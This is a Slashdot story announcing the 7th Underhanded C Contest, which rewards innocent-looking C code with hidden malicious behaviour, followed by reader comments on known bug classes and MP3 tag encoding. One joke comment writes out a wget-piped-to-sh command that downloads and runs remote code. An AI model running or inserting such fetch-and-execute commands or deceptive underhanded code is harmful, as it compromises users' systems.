Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
Programming Security

The 7th Underhanded C Contest Is Online 41

Xcott Craver writes The 7th Underhanded C Contest is now open. The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet somehow exhibits evil behavior that cannot be seen even when staring at the source code. The winners from 2013 are also online, and their clever and insightful submissions make for fun reading.
This discussion has been archived. No new comments can be posted.

The 7th Underhanded C Contest Is Online

Comments Filter:
  • by Anonymous Coward on Monday November 03, 2014 @11:46AM (#48301821)

    Previously the contest has been about doing nefarious stuff to the user of the program while keeping the code innocuous.
    This time, they want you to clandestinely warn users of government spying. It's a complete about-face on the definition of "underhanded". I love it.

  • Not so clever (Score:3, Informative)

    by Anonymous Coward on Monday November 03, 2014 @12:06PM (#48302047)

    Don't get me wrong this is all great fun yet many of these schemes stand no chance of being committed in any serious project.

    Implicit returns generate compiler warnings.

    printf variable as format specifier is a well known security issue lazy eyeballs and static analysis tools check for.

    Serialization delimiter games are also well known issues standing little chance of being accepted.

    • Not so clever (Score:4, Insightful)

      by slashdice ( 3722985 ) on Monday November 03, 2014 @12:27PM (#48302273)
      were that true, CVE wouldn't be a thing.
      • CVE is a thing because static analysis tools are too chatty about too many things that have no chance of causing failure given your particular architecture or other system characteristics, but need to be examined/handled nevertheless. Tie that in with often subpar tools with subpar UI's and/or configurability and/or management that worries more about new features than code hygiene, and you will be saddled with CVE's because the tools wont be used, no matter how many issues they might find.

    • by BlackPignouf ( 1017012 ) on Monday November 03, 2014 @12:34PM (#48302341)

      Yeah right.
      Something like this http://www.gergely.risko.hu/de... [risko.hu] would never get committed.

      • by Anonymous Coward

        To be fair, the macro Debian removed was causing all sorts of warnings from one of them thar "analysis tools" for using uninitialized memory.

  • exec("wget -O- http: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

    • For best results, use FTP! Comes with free side effects.*

      exec("wget -O- ftp: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

      (*FTP offer is nontransferable and must be presented at time of online download or Promo Code must be entered at 127.0.0.1 to receive discount. Underhanded discounts applied prior to percent-off total download discounts. Offer cannot be used in conjunction with any other percent-off discounts, including version-specific discounts. Offer not valid on the following merchandise: OpenBSD CD purchases; wget Cares® cause merchandise or other charitable

  • OpenSSL (Score:5, Funny)

    by Anonymous Coward on Monday November 03, 2014 @12:46PM (#48302495)

    Sorry guys but this year's winner hands down is OpenSSL.

  • The last contest only ended a few weeks ago!
  • In Amarok 1.4, when you change the tags in an MP3 file, they are not actually ASCII, they are some kind of UTF-8 reencode that looks exactly like ASCII in Amarok and get printed correctly on a terminal. But when the files are transferred and displayed on some MP3 players they appear as "mojibake".
    • by Anonymous Coward

      I transcoded some FLACs to mp3s the other day using mp3fs (aside: which is actually really cool, it's a fuse filesystem that you point to somewhere containing flacs, and when you browse the mount point all the .flac files show up as .mp3 and you can just copy the mp3 files out). The FLAC tags are readable in Windows (both winamp and QuodLibet) and Linux. The mp3 tags are readable in Windows (winamp, QuodLibet and File Explorer's tracklist view) and Linux. All of the tags are gibberish on my car's in-dash

    • It might be rendering the tags in UTF-16, which for code points \x00 - \x7F look just like ASCII with a NULL byte \x00 before (Big Endian) or after (Little Endian) each printable character.

      Can you give an example? I'll take a look. Run Unix "strings" on the file, run it through "hd" and post it as a reply here.

      $ strings file.mp3 | grep "known text" | hd

  • by Anonymous Coward

    Most of the entries in past years have relied on subtle use of unsafe code (buffer overruns, platform-dependent quirks, etc.) for which there are plenty of opportunities in C. I'd really like to see them run, in parallel with the same challenge, an Underhanded Java Contest.

"I'm a mean green mother from outer space" -- Audrey II, The Little Shop of Horrors

Working...